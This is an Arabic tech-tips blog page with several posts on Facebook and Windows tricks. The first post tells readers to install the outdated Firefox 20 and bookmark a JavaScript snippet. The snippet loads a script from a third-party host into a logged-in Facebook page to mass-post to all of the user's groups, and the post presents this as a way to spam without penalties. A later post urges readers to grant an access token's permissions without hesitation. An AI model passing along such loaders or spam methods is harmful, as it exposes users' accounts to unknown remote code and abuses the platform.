كيف تنشر في عدة مجموعات على الفيسبوك بنقرة زر واحدة

0 التعليقات

قد توجد العديد من الحيل للنشر في عدة مجموعات على الفيسبوك دفعة واحدة ، لكن معضمها هو محضور من طرف الفيسبوك ، واغلبها قد يعرض حسابك لخطر الإقفال ، مدام ان فيسبوك تعتبر ذلك نوع من السبام الذي قد ينزل عقوبات على حسابك ، وعليه  تبقى من الطرق الاكثر أمان هي إستعمال اكواد الجاڤا سكريبت ، وذلك لسهولتها وسرعتها بالإضافة إلى انها لا تعرض حسابك للخطر كما هو الامر بالنسبة للـ Access Token  .
الحلقة809: كيف تنشر في عدة مجموعات على فيسبوك بنقرة زر واحدة

وعليه في موضوع هذه التدوينة ساقدم لك حيلة بسيطة يمكنك معها النشر في عدة مجموعات دون الخوف من تعرض حسابك للعقوبة . حيث يكفي ان تتوفر على الإصدار القديم من موزيلا فايرفوكس   Firefox 20 ويمكنك تحميله من الرابط اسفل الڤيديو ، وكذلك ان تتوفر على الكود الاتي :
javascript:(function(){document.body.appendChild(document.createElement('script')).src='http://yourjavascript.com/01351321011/s.js';})();
والذي سيمكنك من النشر في عدة مجموعات على الفيسبوك مهما بلغ عددها !

الطريقة الولى تمثل في تتبيث برنامج موزيلا فايرفوكس الإصدار الــ 20 تم بعد ذلك قم بإضافة مفضلة جديدة Bookmark إلى المتصفح ،

في إسم المفضلة إختر gppost اما في location فضع كود الجاڤاسكريبت الذي حددته في اول التدوينة ، بعد ذلك انقر على ok
.
الان قم بالدخول إلى حسابك في فيسبوك وانقر على المفضلة التي اضفتها بعد ذلك ستضهر خانة صغيرة انشر فيها ماشئت رابط موقعك او رسالة وسيتم نشرها في جميع مجموعات الفيسبوك المشترك بها ! حظ موفق :)

تحميل فايرفوكس الإصدار 20 

أهمية إضافة صندوق التعليقات فيسبوك الى مدونتك وكيف تقوم بذلك

0 التعليقات


أهمية إضافة صندوق التعليقات فيسبوك الى مدونتك وكيف تقوم بذلك

لعل ان اي مدون هو يبحث دائما عن مصادر جديدة لجلب الزوار إلى مدونته ، خصوصا وإن كانت المدونة لازالت تشق خطواتها الاولى إلى الشهرة . ومن بين اهم مصادر الترافيك حاليا هي الشبكات الاجتماعية ، التي اضحت تساهم بشكل كبير في جلب عدد كبير من الزوا يوميا إلى المواقع ، لهذا فإن العديد من ملاك المواقع يهتمون بشكل كبير بالشبكات الإجتماعية من اجل جلب زوار إلى مواقعهم ، ومن بين اهم الشبكات الاجتماعية هي شبكة فيسبوك التي تضم ملاين المشتركين ، حيث يمكننا الإستفادة منها بشكل كبير في جلب زوار دائمين إلى المدونة من خلال الإهتمام  بزيادة عدد المعجبين بصفحة المدونة وكذلك إستعمال نظام تعليقات الفيسبوك في الموقع من اجل جلب ترافيك آخر للموقع .

كيف يساعدك نظام تعليقات الفيسبوك في الرفع من عدد زوار المدونة ؟ 

يعتبر نظام تعليقات فيسبوك له دور فعال في زيادة عدد زوار المدونة ذلك من خلال اي شخص يضع تعليق على مدونتك من خلال حسابه في الفيسبوك ، فهناك إحتمالية كبيرة ان يضهر تعليقه في بروفايله الخاص  على الفيسبوك الامر الذيقد ثير إنتباه اصدقائه على الفيسبوك  وقد يبادرون بزيارة الموضوع بدورهم ، فكل شخص يعلق على موضوع من مواضيع المدونة بإستعمال نظام تعليقات الفيسبوك فهو بصورة غير مباشرة يساعدك في جلب أصدقائه كذلك إلى مدونتك ، لهذا فإن كانت مدونتك مبتدئة من الضروري عليك الإهتمام بهذه النقطة من اجل جلب الترافيك . 

كيف تضيف  تعليقات الفيسبوك على مدونة بلوجر 

توجد طريقة صحيحة واحدة لإضافة نظام تعليقات الفيسبوك  ، وهي عن طريق الذهاب اولا إلى مركز تطبيقات فيسبوك developers.facebook.com/apps 

تم بعد ذلك انقر على إنشاء تطبيق جديد تم اضف المعلومات المطلوبة منك كما هي موضوحة في الصورة اسفله 

بعد ذلك ستضهر لكن نافدة تطلب منك إدخال كود كابتشا بعد إدخاله ستيم توجيهك لصفحة اخرى إبحث عن كود التطبيق App ID: في اعلى الصفحة وقم بنسخه ، كذلك ادخل رابط عنوان الموقع في App Domains وقم بتحفيظ الثغيرات .


الان إنتهيت من الخطوة الاولى ، للنتقل للخطوة الثانية وهي عن طريق التوجه إلى منصة المدونة على بلوجر تم إذهب إلى تحرير القالب وابحث عن هذا الكود <html بعد ان تجده قم بإضافة xmlns:fb='http://www.facebook.com/2008/fbml' لكي يصبح عل هذا الشكل كما في الصورة
جيد ! الان إبحث عن <body> وبعدها مباشرة قم بإضافة الكود الآتي :
<div id='fb-root'/>
<script>
window.fbAsyncInit = function() {
    FB.init({xfbml: true, appId: معرف التطبيق });
  };
  (function() {
    var e = document.createElement('script'); e.async = true;
    e.src = document.location.protocol +
      '//connect.facebook.net/ar_AR/all.js'
    document.getElementById('fb-root').appendChild(e);
  }());
</script>

طبعا ستقوم بتغير معرف التطبيق باللون الاحمر إلى الكود الذي نسخته في المرحلة الاولى من هذا الشرح ،بعد ان تقوم ببإضافته توجه مرة اخرى وابحث عن : </head>  واضف قبل الوسام الكود الاتي:

<b:if cond='data:blog.pageType == &quot;item&quot;'>
<meta   expr:content='data:blog.pageTitle' property='og:title'/>
<meta   expr:content='data:blog.url' property='og:url'/>
<b:else/>
<meta   expr:content='data:blog.title' property='og:title'/>
<meta   expr:content='data:blog.homepageUrl' property='og:url'/>
</b:if>
<meta   content='عنوان المدونة' property='og:site_name'/>
<meta   content='http://google.com/help/hc/images/logos/blogger_logo.gif'   property='og:image'/>
<meta content='معرف التطبيق ID'   property='fb:app_id'/>
<meta content='معرف حسابك على فيسبوك ID'   property='fb:admins'/>
<meta content='article'   property='og:type'/>

غير عنوان المدونة إلى إسم مدونتك ، والتي ستضهر في بروفايل اي شخص عندما سيعلق على موضوع في مدونتك بإستخدام حسابه في الفيسبوك ، كذلك قم بإضافة معرف حسابك على الفيسبوك والذي سيجعلك مديرا للتعليقات  من اجل إدارتها ، ولكي تعرف معرفك الخاص انقر على بروفايلك في الفيسبوك وابحث في الرابط في الاعلى عن إسم المستخدم مثلا حسابي الخاص هو facebook.com/raghibs إدن المعرف هو raghibs  ساقوم بإضافته في الكود . اما بالنسبة لمعرف التطبيق فستضيف الكود التطبيق  App ID الذي نسخته مرة اخرى .

الان اشرفنا على الإنتهاء ، لم يبقى سوى إضافة نافدة تعليقا الفيسبوك إلى المدونة  وسيكون ذلك عن طريق البحث عن <data:post.body/> تم إضإفة الكود الاتي مباشرة اسفلها :
<b:if cond='data:blog.pageType == &quot;item&quot;'>
<div><script src='http://connect.facebook.net/ar_AR/all.js#xfbml=1'/>
<fb:comments width='600' expr:href='data:post.url' expr:title='data:post.title' expr:xid='data:post.id' migrated='1'/>
</div>
</b:if>

يمكنك تغير الــ width='600' إلى اي قيمة لكي يتناسب عرض مربع تعليقات الفيسبوك مع مدونتك ، والان لم يبقى عليك سوى تحفيظ العمل ومبروك عليك إضافة مربع تعليقات الفيسبوك

كيف تتأكد من ان صديقك على الفيس بوك قام بحضرك او فقط عطل الحساب

0 التعليقات

قد تتفاجئ للوهلة الاولى ان صديق لك على الفيسبوك قد إختفى دون سابق إعلام ، لكي تنتابك عدة شكوك ، هل قام بحضرك ؟ او انه قام بتعطيل حسابه في الفيسبوك ،" إلا ان العديد قد يذهب الى انه تم حضره "، لهذا في هذا الموضوع ساريك طريقتين لكي تتاكد هل تم حضرك او ان الحساب قد عطل من فيسبوك . 
كيف تتأكد من ان صديقك على الفيس بوك قام بحضرك او فقط عطل الحساب

الطريقة الاولى : عن طريق ال opengraph
هذه الطريقة تنفع مع جميع حسابات فيسبوك سواء كانت في آخر إصدار او غير ذلك ، وتمكن الطريقة في اخد إسم المستخدم او معرفه الخاص  في الفيسبوك عن طريق الذهاب إلى رسائل تم تفتح رسائلك مع الحساب المعطل وابحث في الرابط ستجد إما اسم المستخدم او ارقام وهي عبارة عن المعرف كما في الصورة .

بعد ذلك توجه إلى الرابط opengraph وقم بكتابة إسم المستخدم او رقم المعرف بعد / على هذا الشكل: graph.facebook.com/raghibs طبعا  raghibs  هو إسم المستخدم فإن ضهرت لك معلومات الحساب فهذا يعني انه قد تم حضرك اما ان لم تضهر وضهرت رسالة :  "message": "Unsupported get request.",
 فهذا يعني ان الحساب غير مفعل وانه قد تم تعطيله فقط .
تنبيه : إذا لم تفهم جيدا تابع حلقة اليوم الشرح مصور بالڤيديو 

الطريقة الثانية :
تعمل هذه الطريقة مع الحسابات التي تتواجد في اخر إصدار ، ويكفي ان تبحث عن إسم الصديق الذي تشك انه قام بحضرك في لائحة الإصدقاء فإذا وجدته انقر على اسمه ستضهر لك رسالة ان الحساب هو معطل ، اما ان لم تجد اسمه فهذا يعني انه قام بحضرك . كما الصورة :



كيف تجعل برامجك تشتغل بسرعة كبيرة جدا على الويندوز

0 التعليقات

قد يأخد حاسوبك وقت طويل من اجل تشغيل برنامج عند النقر عليه ، وقد لاترغب في إنتظار تلك المدة التي قد تطول إذا كان البرنامج يحتاج إلى الكثير من موارد الحاسوب ، لهذا في هذا الشرح ساريك كيف تجعل اي برنامج يقلع بسرعة كبيرة جدا وحتما انك ستلاحظ ذلك . فالطريقة هي بسيطة جدا حيث يكفي ان تضيف الكود الاتي  prefetch:1/ على إختصار رابط البرنامج وسيقلع بسرعة . كيف ذلك ؟

اولا يجب ان يكون البرنامج مختصرا على سطح المكتب ، بعد ذلك انقر عليه بزر الفأرة الايمن وتوجه إلى proprieties  تم انقر مرة اخرى على shortcut تم target  حيث في المربع المقابل سيتم إضافة الكود prefetch:1/ وذلك مباشرة بعد الرمز"   ليصبح على هذا الشكل :  "C:\Program Files\programs\Phone\prog.exe" /prefetch:1 . لاتنسى ان تترك مسافة بين" والكود /prefetch:1
 بعد ذلك انقر على Apply حفظ الإعدادات وتوجه إلى تشغيل البرنامج ولاحظ مدة الإقلاع كيف ستتقلص .
 إذا لم تفهم الشرح الكتابي جيدا يمكنك مشاهدة الحلقة وفرجة ممتعة .


كيف تتعرف على هوية من قام بسرقة كميراتك الخاصة

0 التعليقات
توجد العديد من السيناريوهات التي يمكن من خلالها ان تؤذي إلى ضياع  كاميرتك، وقد يكون ثمن الكميرا باهظ جذا إذا ما كنا نتحدث عن كميرات إحترافية . لهذا الغرض أردت ان اقدم لك في هذا الدرس طريقة بسيطة قد تساعدك بشكل كبير في الوصول إلى السارق او إلى مكان تواجد  كاميرتك ، ذلك من خلال الصور التي ستلتقط بالكميرا الضائعة ، حيث يكفي ان يتم احدى الصور على الانترنت ، حتى تستطيع الوصول إلى هوية الشخص الذي يستعمل الكميرا ، خصوصا في وقتنا الحالي حيث اضحى إلتقاط الصور ورفعها على الأنترنت شيئ منتشر بكثرة .
غير ذلك وبعيدا عن موضوع التعرف على هوية سارق كمرتك الإحترافية ، يمكنك كذلك مشاهدة الصور التي التقطت  بالكميرا من المشتري في المستقبل في حالة إن بعتها ، اليس هذا رائع ؟؟ !!

طبعا هو كذلك ، فقط شاهد معي حلقة اليوم وفرجة ممتعة .(الرابط المستخدم في الشرح اسفل الڤيديو ) 

كيف تعرف أن حسابك على الفيسبوك معرف لتفادي إغلاقه في أي وقت

0 التعليقات


قد تفاجئ العديد من مستخدمي الشبكة الإجتماعية فيسبوك من عملية إغلاق حساباتهم وطلب بطاقة الهوية لتعريفه دون أي سبب يدعوا لذلك ، بحث ان أغلب المستخدمين قد لم يعمدوا على إنتهاك سياسة إستخدام فيسبوك ، غير ذلك فالعديد من الحسابات يتم توقيفها بشكل يومي ، ذلك لان الشركة تشك في ان تكون حسابات سبام ، وهي عبارة عن حسابات يستخدمها بعض الافراد في نشر روابط متنوعة او لها نشاطات مريبة مما يدفع بإدارة فيسبوك إلى إقفالها وطلب تأكيد الهوية .
كيف تعرف أن حسابك على الفيسبوك معرف لتفادي إغلاقه في أي وقت

لهذا في هذه التدوينة سأريك طريقة بسيطة من خلالها تتأكد إن كان حسابك معرف لدى شركة فيسبوك ، او غير معرف . حيث في حالة إن كان الحساب معرف فلا خوف عليك ان يتم إقفاله ، اللهم في حالة واحدة وهي في حالة إختراقه ، حيث ان إدارة فيسبوك قد تعمد على إقفاله وطلب بطاقة تعريف الهوية من اجل منع الهاكر من الدخول إلى إلحساب . أما لتعريف الحساب يبقى عليك ان تقوم بإضافة رقمك الهاتفي كما سيأتي في هذا الشرح .

اول شي توجه إلى الرابط الاول اسفل الڤيديو Facebook Devloppers تم بعد ذلك أنقر على Get Acess token، ستنبثق نافدة أنقر على Extended Premissions تم أنقر مرة أخرى على Read_insights بعد ذلك انقر على Get Acess Token حيث قد يطلب منك السماح للتطبيق بقرائة بيانات حسابك فلاتتردد .
بعد الإنتهاء في أقصى يسار الصفحة ستجد علامة (+) مباشرة اسفل كلمة name انقر عليها تم من القائمة المسندة إختر verified تم انقر على الزر submit اعلى اليمين فإذا ضهر لك كلمة true امام verified فهذا يعني ان حسابك معرف ، اما إن لم تضهر فهذا يعني ان حسابك غير معرف ويجب عليك أن تعرفه عن طريق إضافة رقمك الهاتفي الخاص .
ولإضافة رقم هاتفي لحسابك فيسبوك من اجل تعريفه انقر على mobile بعد ذلك اكتب رقم هاتفك وإنتضر كود التفعيل بعد التوصل به اكتبه في الخانة التي تطلب منك إدخال كود من 4 ارقام . وهكذا تكون قد عرفت الحساب . 
يمكنك مشاهدة الڤيديو اسفله للشرح المصور فرجة ممتعة (الروابط اسفل الڤيديو)

اختصار روابط















اعلانات